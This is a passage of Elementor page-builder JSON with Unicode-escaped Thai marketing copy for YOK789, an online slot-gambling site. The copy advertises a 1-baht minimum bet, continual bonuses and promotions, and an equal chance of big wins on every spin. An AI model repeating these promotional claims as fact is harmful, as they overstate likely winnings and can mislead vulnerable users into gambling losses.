\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e41\\u0e04\\u0e48\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e15\\u0e48\\u0e22\\u0e31\\u0e07\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e27\\u0e48\\u0e32\\u0e04\\u0e38\\u0e49\\u0e21\\u0e04\\u0e48\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e0a\\u0e31\\u0e14\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14<\\/span><\\/b><\\/p><ul><li><b><span style=\\\"color: #99cc00;\\\">\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49<\\/span> <\\/b><\\/li><\\/ul><p><b><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e32\\u0e22\\u0e07\\u0e1a\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e16\\u0e2d\\u0e22\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e1a\\u0e17\\u0e2a\\u0e1a\\u0e32\\u0e22\\u0e01\\u0e23\\u0e30\\u0e40\\u0e1b\\u0e4b\\u0e32 \\u0e41\\u0e04\\u0e48\\u0e21\\u0e35\\u0e17\\u0e38\\u0e19\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e2a\\u0e34\\u0e1a\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e17\\u0e32\\u0e07\\u0e44\\u0e14\\u0e49\\u0e44\\u0e27 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e14\\u0e14\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1a\\u0e23\\u0e34\\u0e2b\\u0e32\\u0e23\\u0e17\\u0e38\\u0e19\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e04\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e1b\\u0e31\\u0e49\\u0e19\\u0e01\\u0e33\\u0e44\\u0e23\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e01\\u0e47\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e32\\u0e21\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e04\\u0e37\\u0e2d\\u0e41\\u0e21\\u0e49\\u0e43\\u0e0a\\u0e49\\u0e17\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e21\\u0e32\\u0e01\\u0e01\\u0e47\\u0e22\\u0e31\\u0e07\\u0e44\\u0e14\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e01\\u0e31\\u0e1a\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e2a\\u0e39\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e08\\u0e23\\u0e34\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e41\\u0e1a\\u0e48\\u0e07\\u0e0a\\u0e19\\u0e0a\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e17\\u0e48\\u0e32\\u0e01\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e49\\u0e27\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e15\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e14\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e2b\\u0e49\\u0e42\\u0e15\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e32\\u0e21\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07<\\/span><\\/b><\\/p><ul><li><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e04\\u0e23\\u0e1a <\\/b><\\/span><\\/li><\\/ul><p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e23\\u0e27\\u0e21\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e41\\u0e19\\u0e27\\u0e44\\u0e27\\u0e49\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e18\\u0e35\\u0e21\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22 \\u0e27\\u0e31\\u0e12\\u0e19\\u0e18\\u0e23\\u0e23\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e49\\u0e33\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e19\\u0e33\\u0e16\\u0e39\\u0e01\\u0e04\\u0e31\\u0e14\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e19\\u0e49\\u0e19\\u0e04\\u0e38\\u0e13\\u0e20\\u0e32\\u0e1e \\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e42\\u0e25\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1a\\u0e31\\u0e19\\u0e40\\u0e17\\u0e34\\u0e07 \\u0e08\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e0a\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e01\\u0e23\\u0e30\\u0e08\\u0e32\\u0e22\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e01\\u0e47\\u0e21\\u0e35\\u0e15\\u0e31\\u0e27\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e22 \\u0e46 \\u0e44\\u0e21\\u0e48\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e14\\u0e23\\u0e2d\\u0e1b \\u0e43\\u0e04\\u0e23\\u0e40\\u0e1a\\u0e37\\u0e48\\u0e2d\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e46 \\u0e01\\u0e47\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e41\\u0e19\\u0e27\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e04\\u0e25\\u0e31\\u0e07\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e27\\u0e31\\u0e19\\u0e44\\u0e21\\u0e48\\u0e19\\u0e48\\u0e32\\u0e40\\u0e1a\\u0e37\\u0e48\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e2a\\u0e35\\u0e2a\\u0e31\\u0e19\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e9ff89c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-1-.webp\",\"id\":294,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8b749b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1a\\u0e2d\\u0e01\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19 \\u0e17\\u0e32\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32 YOK \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a \\u0e1b\\u0e31\\u0e19 \\u0e42\\u0e1b\\u0e23 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a455b44\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e2a\\u0e48\\u0e2d\\u0e07\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e0a\\u0e35\\u0e27\\u0e34\\u0e15 \\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e40\\u0e0a\\u0e47\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e40\\u0e23\\u0e32 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e42\\u0e1b\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e04\\u0e38\\u0e49\\u0e21 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e1f\\u0e35\\u0e49\\u0e22\\u0e27\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e15\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e33\\u0e19\\u0e27\\u0e13\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34 \\u0e23\\u0e31\\u0e1a\\u0e42\\u0e1b\\u0e23\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e31\\u0e01\\u0e41\\u0e0a\\u0e15\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e41\\u0e04\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e1a\\u0e2d\\u0e01\\u0e40\\u0e25\\u0e22\\u0e27\\u0e48\\u0e32\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e30\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e44\\u0e14\\u0e49\\u0e15\\u0e31\\u0e27\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e48\\u0e32\\u0e22\\u0e14\\u0e31\\u0e07\\u0e23\\u0e27\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a \\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e25\\u0e38\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e22<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 YOK789 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e08\\u0e01\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e23\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19 \\u0e46 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e15\\u0e39\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e41\\u0e15\\u0e48\\u0e28\\u0e31\\u0e01\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e32\\u0e23\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e44\\u0e14\\u0e49\\u0e44\\u0e01\\u0e25\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e25\\u0e49\\u0e32\\u0e19 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e04\\u0e31\\u0e14\\u0e21\\u0e32\\u0e40\\u0e19\\u0e49\\u0e19\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e17\\u0e38\\u0e19\\u0e19\\u0e49\\u0e2d\\u0e22\\u0e01\\u0e47\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e08\\u0e31\\u0e07\\u0e01\\u0e47\\u0e40\\u0e23\\u0e48\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e44\\u0e25\\u0e48\\u0e22\\u0e2d\\u0e14\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e16\\u0e39\\u0e01\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e2d\\u0e2d\\u0e01\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07 \\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e23\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e41\\u0e25\\u0e30\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e49\\u0e2d\\u0e19\\u0e43\\u0e2b\\u0e0d\\u0e48 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1f\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e41\\u0e15\\u0e48\\u0e43\\u0e0a\\u0e49\\u0e01\\u0e32\\u0e23\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e04\\u0e27\\u0e1a\\u0e04\\u0e39\\u0e48\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e40\\u0e25\\u0e47\\u0e01\\u0e41\\u0e15\\u0e48\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e43\\u0e19\\u0e42\\u0e25\\u0e01\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"YOK789 \\u0e22\\u0e01\\u0e15\\u0e31\\u0e27\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e19\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e49\\u0e19\\u0e14\\u0e49\\u0e27\\u0e22\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e38\\u0e19 \\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 1 